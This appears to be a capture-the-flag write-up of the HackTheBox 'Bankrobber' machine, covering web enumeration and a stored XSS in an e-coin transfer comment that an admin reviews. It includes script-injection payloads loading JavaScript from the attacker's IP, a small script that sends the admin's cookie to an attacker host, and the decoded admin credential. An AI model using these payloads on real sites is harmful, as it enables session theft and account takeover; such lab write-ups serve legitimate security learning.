2 :80 :443 XSS > admin
http://bankrobber.htb/
e-coin website
$ gobuster dir -u http://bankrobber.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/img (Status: 301) [Size: 338] [--> http://bankrobber.htb/img/]
/register.php (Status: 200) [Size: 0]
/login.php (Status: 302) [Size: 0] [--> index.php]
/index.php (Status: 200) [Size: 8245]
/user (Status: 301) [Size: 339] [--> http://bankrobber.htb/user/]
/admin (Status: 301) [Size: 340] [--> http://bankrobber.htb/admin/]
/link.php (Status: 200) [Size: 0]
/css (Status: 301) [Size: 338] [--> http://bankrobber.htb/css/]
/js (Status: 301) [Size: 337] [--> http://bankrobber.htb/js/]
/examples (Status: 503) [Size: 1060]
/generic.html (Status: 200) [Size: 13343]
/notes.txt (Status: 200) [Size: 133]
/logout.php (Status: 302) [Size: 0] [--> index.php?msg=Succesfully logged out]
/elements.html (Status: 200) [Size: 34812]
/licenses (Status: 403) [Size: 1205]
/fonts (Status: 301) [Size: 340] [--> http://bankrobber.htb/fonts/]
/phpmyadmin (Status: 403) [Size: 1205]
/webalizer (Status: 403) [Size: 1046]
http://bankrobber.htb/admin/
You're not authorized to view this page
http://bankrobber.htb/generic.html
Similar website (old); links not working.
http://bankrobber.htb/notes.txt
- Move all files from the default Xampp folder: TODO
- Encode comments for every IP address except localhost: Done
- Take a break..
# login page is on the index.php itself
# sends POST request
# default creds admin:admin; nothing happens
# register is also on index.php
# sends POST request
# response
http://bankrobber.htb/index.php?msg=User%20created.
# login as kashz:kashz
POST /login.php HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://bankrobber.htb
DNT: 1
Connection: close
Referer: http://bankrobber.htb/index.php?msg=User%20created.
Upgrade-Insecure-Requests: 1
username=kashz&password=kashz£s=Submit+Query
# fetches /user/
GET /user/ HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bankrobber.htb/index.php?msg=User%20created.
DNT: 1
Connection: close
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
Upgrade-Insecure-Requests: 1
# cookie is just b64.
# interesting js file is requested
GET /js/transfer.js HTTP/1.1
Host: bankrobber.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bankrobber.htb/user/
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
# transfer.js
//Start user functions
function transferEcoin(fromId,toId,amount,comment){
var http = new XMLHttpRequest();
var url = 'transfer.php';
var params = 'fromId='+fromId+'&toId='+toId+'&amount='+amount+'&comment='+comment;
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.send(params);
}
function getVal(id){
return document.getElementById(id).value;
}
function getData(){
fromId = getVal("fromId");
toId = getVal("toId");
amount = getVal("amount");
comment = getVal("comment");
transferEcoin(fromId,toId,amount,comment);
alert('Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.');
}
// End user function
// Start admin functions
function handleTransaction(status,id,from,to,amount){
var http = new XMLHttpRequest();
var url = 'handle.php';
var params = 'status='+status+'&id='+id+'&from='+from+'&to='+to+'&amount='+amount;
http.open('POST', url, true);
http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
http.send(params);
}
// End admin functions
# cant find the handle.php code.
$ gobuster dir -u http://bankrobber.htb/user -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/index.php (Status: 200) [Size: 39]
/auth.php (Status: 200) [Size: 39]
/transfer.php (Status: 200) [Size: 39]
# nothing here
# no vhosts
# exploring transfer e-coin
POST /user/transfer.php HTTP/1.1
Host: bankrobber.htb
Cookie: id=8; username=a2FzaHo%3D; password=a2FzaHo%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://bankrobber.htb
Dnt: 1
Referer: https://bankrobber.htb/user/
Te: trailers
Connection: close
fromId=8&toId=2&amount=10&comment=test
# then comes a popup
Transfer on hold. An admin will review it within a minute.\nAfter that he will decide whether the transaction will be dropped or not.
# as admin will review our transaction, maybe we can request a callback
# tried links, nothing
Trying XSS
<script src="http://10.10.16.7/"></script>
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:23:58] "GET / HTTP/1.1" 200 -
# we do get a callback
# tried using PayloadAllTheThings/XSS - was getting nothing.
# simple way - requested an .js file and executed it on server
# requesting .js file
| <script src='http://10.10.16.7/kashz.js'> </script>
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:30:38] code 404, message File not found
10.10.10.154 - - [30/Sep/2021 15:30:38] "GET /kashz.js HTTP/1.1" 404 -
# file: kashz.js
function cookie1() {
var img = document.createElement("img");
img.src = "http://IP/?cookie=" + document.cookie;
document.body.appendChild(img);
}
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.154 - - [30/Sep/2021 15:35:58] "GET /kashz.js HTTP/1.1" 200 -
10.10.10.154 - - [30/Sep/2021 15:35:59] "GET /cookie?=username=YWRtaW4%3D;%20password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D;%20id=1 HTTP/1.1" 404 -
# url-decode
GET /cookie?=username=YWRtaW4=; password=SG9wZWxlc3Nyb21hbnRpYw==; id=1 HTTP/1.1" 404
# base64 -d
admin:Hopelessromantic
Last updated